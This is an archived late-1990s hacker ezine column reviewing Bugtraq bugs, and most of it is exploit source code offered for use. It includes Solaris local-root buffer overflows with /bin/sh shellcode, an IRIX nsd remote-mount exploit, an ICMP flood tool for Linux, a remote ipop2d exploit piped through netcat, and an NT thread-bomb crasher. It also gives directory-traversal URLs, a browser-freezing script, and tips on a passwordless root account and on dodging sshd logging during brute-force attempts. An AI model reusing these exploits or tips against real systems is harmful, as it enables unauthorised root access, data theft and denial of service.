💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › F4ITH › sauid2.… captured on 2021-12-03 at 14:04:38.
View Raw
More Information
-=-=-=-=-=-=-
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]:::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Bugtraq review
---------
all these bugs have not been varified by me, use them at your own risk
---------
been an interesting time recently on bugtraq. A was found in IE4 which means
that if someone tries to bookmark your site, they will not be able to access
their browser any more
The bug works because IE5 tries to download a file called favicon.ico from
the a web site when a user bookmarks it. It uses this icon to display next
to the site in the faverites list. The bug works when the file isn't of the
correct format, IE5 crashes :)
This means you can stop all those script kiddies from bookmarking your site
by putting a file called favicon.ico (just open up a t-file and write hello
or something) This will encourage some people to use netscape and generally
piss off microshaft. And the best part is, it's totally legal :)
---
Another bug that was revealed was in the installation program for openlinux
2.2. The problem lies in that, when it installs it inserts a user in the
password file called 'help'. This account is meant to be used to rescue the
system if it crashes during installation. Why they don't just use root i
don't know, but the account stays there after installation with root privs
and no password. So if ya see any OL systems around try that out. I've
seen 1 so far and it worked like a dream (of course i notified the sysadmin
of it straight away :))
---
Yet more buffer overflows, this one for dtprintinfo, root. This exploit code
works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle
with the code to get it working on other versions. To get it working you
will have to type this first
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
main()
{
putenv("LANG=");
for (i=0;i<BUFSIZE;i++) x[i]=NOP;
for (i=0;i<strlen(exploit_code);i++)
x[STARTADR+i]=exploit_code[i];
ret_adr=get_sp() - 1292 + 148;
for (i = ADJUST; i < 400 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
"-p",x,(char *) 0);
}
---
another exploit is in the lpset command. This goes sorta like this
/*===================================================================
ex_lpset.c Overflow Exploits( for Intel Edition )
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=====================================================================
#define OFFSET 0x3b88
#define STARTADR 700
#define ENDADR 1200
#define EX_STADR 8000
#define BUFSIZE 22000
#define NOP 0x90
unsigned long ret_adr;
int i,adjust;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
"\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
"\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
"\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
"\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
"\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
"\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
static char x[BUFSIZE];
main(int argc, char **argv)
{
memset(x,NOP,18000);
ret_adr=get_sp()-OFFSET;
printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n");
printf("Input (0-3) : "); scanf("%d",&adjust);
printf("Jumping Address = 0x%lx\n",ret_adr);
for (i = adjust+STARTADR; i<ENDADR ; i+=4){
x[i+2]=ret_adr & 0xff;
x[i+3]=(ret_adr >> 8 ) &0xff;
x[i+0]=(ret_adr >> 16 ) &0xff;
x[i+1]=(ret_adr >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++)
x[i+EX_STADR]=exploit_code[i];
x[5000]='=';
x[18000]=0;
execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
}
---
Next up we have more problems with sshd. This one allows you to try to brute
force logins to a shell without being detected. Normally you are given 3
attemps to log into an account before you will be disconnected, your IP
logged and e-mail sent to the feds and your ISP. But, if you disconnect after
only 2 attemps, the IP is not logged. If ya ask me brute force on a remote
host is pretty shite to say the least but this is how to do it if ya do wanna
try it
---
A rather nasty vulnerability lies in a program called midikeys, this is a
popular program installed by a lot of sysadmins to play midi files.
Unfortunately it's suid root ...ohh dear... Set your machine as a x-host for
the machine your trying to hack. Now load up midikeys with the display set
to your machine, try to open a text file. Midikeys will be very friendly and
open up a text editor for you which can open any file on the remote system.
---
Solaris 2.6 and 2.7 have a local root but in libc. Goes something like this
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
============================================================
#define EV "LC_MESSAGES="
#define ADJUST 0
#define OFFSET 5392
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}
---
A lot of mail servers are now implementing web interfaces. This can be a
problem whe usuffer holes like this. The following programs have these
problems:
CTMail:
type:
http://[server]:8002/../spool/username/mail.txt
into your web browser and you can view the mail of the user
FTGate:
same as above except this seems to be a bit more reliable than the CTMail bug
NTMail:
This is even worse, it allows you to view any file on the system. Type:
http://[server]:8000/../../../../../boot.ini.
and your looking at boot.ini
I'm sure u'll find nice ways of exploiting these bugs
---
Yet more problems with IRIX comes in the nsd virtual file system. This
allows local users to exploit root. Code coming: (sorry about the extended
coments but i decided to include out of respect to the authour)
/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit
Author: Jefferson Ogata (JO317) <ogata@pobox.com>
Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.
With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.
The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.
This program can successfully mount the nsd-exported virtual filesystem
from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.
On an SGI with SGI C compiler, compile with:
cc -o nsdadv nsdadv.c
Run it this way:
nsdadv /mnt sucker.example.com 1024
with obvious substitutions.
So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.
By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.
Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.
By the way, though you be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.
Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.
Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.
For some fairly extensive info on the nsd implementation, take a look at:
http://www.bitmover.com/lm/lamed_arch.html
What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.
So how could SGI fix this?
Without going back, SGI could at least make nsd respond only to queries
from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.
They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.
At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.
With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.
- ***************************************************************************/
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"
/* File the records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"
/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;
/* All zero file handle. This appears to be the base handle for the nsd
filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };
/* NFS mount options structure to pass to mount(2). The meanings of these
are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
flags field indicates that this is a soft mount without log messages,
and to set the initial timeout and number of retries from fields in
this structure. The fh field is a pointer to the filehandle of the
mount point, whose size is set by fh_len. As noted above, the mount
point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
&sin, /* addr */
(fhandle_t *) fh, /* fh */
NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */
0, /* wsize */
0, /* rsize */
100, /* timeo */
2, /* retrans */
0, /* hostname */
0, /* acregmin */
0, /* acregmax */
0, /* acdirmin */
0, /* acdirmax */
0, /* symttl */
{ 0 }, /* base */
0, /* namemax */
NFS_FHSIZE, /* fh_len */
/* On IRIX 6.4 and up there are also the following... */
/* bdsauto */
/* bdswindow */
/* On IRIX 6.5 there are also the following... */
/* bdsbuflen */
/* pid */
/* maxthreads */
};
void usage (void)
{
fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
fprintf (stderr, "port <port> onto <directory>.\n\n");
exit (1);
}
int main (int argc, char **argv)
{
char *dir;
char *host;
char *ports;
int port;
struct hostent *h;
int fstype;
FILE *mtabf;
struct mntent mnt =
{
0,
0,
NSD_FSTYPE,
"soft,timeo=100,retrans=2",
0,
0,
};
if (argc != 4)
usage ();
dir = argv[1];
host = argv[2];
port = atoi ((ports = argv[3]));
/* Prepare for host lookup. */
memset ((void *) &sin, 0, sizeof (sin));
sin.sin_family = 2;
sin.sin_port = port;
/* Look up the host. */
if (inet_aton (host, &sin.sin_addr))
;
else if ((h = gethostbyname (host)))
{
unsigned long *l = (unsigned long *) *(h->h_addr_list);
sin.sin_addr.s_addr = l[0];
}
else
{
fprintf (stderr, "Cannot resolve host %s.\n", host);
return 1;
}
/* Get filesystem type index for nsd filesystem type. */
if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
{
perror ("sysfs (" NSD_FSTYPE ")");
return 1;
}
fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
host, inet_ntoa (sin.sin_addr), port, dir);
/* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
means "tell server to trust us with attributes" and MS_DATA means
"6-argument mount".
MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
seem to work without this option. So even though this program will
compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
attack nsd. */
if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
!= 0)
{
perror ("mount");
return 1;
}
/* Record mount point in /etc/mtab. */
mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
mnt.mnt_dir = dir;
if (!(mtabf = setmntent (MTAB_FILE, "r+")))
{
perror ("setmntent");
return 1;
}
if (addmntent (mtabf, &mnt) < 0)
{
perror ("addmntent");
return 1;
}
if (endmntent (mtabf) < 0)
{
perror ("endmntent");
return 1;
}
return 0;
}
---
Microshaft are not having a good time (do they ever?). Another bug in IE5
was discovered. Put the following code into your web page to freeze IE and
stop script kiddies viewing your web site
-----cut here-----
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
-----cut here-----
This will put the background colour in an infinite loop and freeze IE
---
Linux kernel 2.2.x seems to get into an awful mess when it is sent a large
number of some types of ICMP packages. To exploit this bug, use this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}
---
Another one of those rare jewls came out earlier this month: a remote root
exploit. This time in ipop2d. use well:
---- SDI-pop2.c ------------------
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
* We do NOT take any responsability for the consequences of using
* this code -- you've been warned! don't be a script k1dd13!
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
----- EOF ---------------------
---
More problems in windoze9x, nt and all other versions at the moment, comes in
the handling of files named prn.* Because in old versions of DOS, this was
reserved as a way of accessing the printer, it will not let you create any
files named prn.* This is o.k, becuase windows won't let you create a file
with that name in any aplication. The problem, as usual with microshaft
products comes in the implementation of networking. If you are able to
access a file on a remote computer you can rename it to prn, and it will be
unremoveable.
This will only work if you access the remote computer using //computer/drive/*
it will not work if you map a network drive to your computer.
This could be a nasty flaw if someone done something like this: (talking DOS
now) rename //computer/c/program files //computer/c/prn this would mean that
the owner of the computer could not access, rename or delete his program
files directory and would probably lose all the data in the directory.
The only solution so far for this problem seems to be by using postix (a unix
emulator for windows) to remove the file. Unix to the rescue once again.
---
A few weeks ago MIRC 5.6 was released. This contains a serious vulnerability
in that if you mention a url in a window, mirc will automaticly tell your
browser to go to that page, oh no, more people with banners and this time you
can't stop it from opening up your web browser and telling it to access the
site.
---
Any of you code kiddies out there want to crash and NT workstation? A nice
little vulnerability that runs a large number of threads can crash it, and
you won't be able to bring up the task manager. Here is the code:
/*
* frootcake.c
* kiva@wookey.org
*
* this tests NT at coping with *really dodgy* code...
* it totally brings my SMP box to being unusable (SP5)
*/
#include <windows.h>
#include <stdio.h>
void poobah();
DWORD WINAPI thread_func (LPVOID lpv)
{
DWORD id;
HANDLE h;
BOOL success = 1;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
while (success){
switch (GetThreadPriority (h)){
case THREAD_PRIORITY_ABOVE_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_BELOW_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_HIGHEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_IDLE:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_LOWEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
}
}
poobah();
return 0;
}
void poobah()
{
DWORD id;
HANDLE h;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
poobah();
}
int main ()
{
printf ("frootcake - kiva@wookey.org\n");
poobah();
return 0;
}
---
As you always know, i like to save the best 'til last. Probably the most
serious hole found recently is a whole that affects 90% of windows servers on
the net, and allows you to execute code remotely. This is a VERY serious
whole that can allow you to run any program you like, including netbus and
back orafice. got to: http://www.eeye.com/database/advisories/ad06081999/
ad06081999-exploit.html for more info
---
Thats all for now. All these bugs aren't garrenteed to work, i haven't
varified most of them so don't come bitching when they don't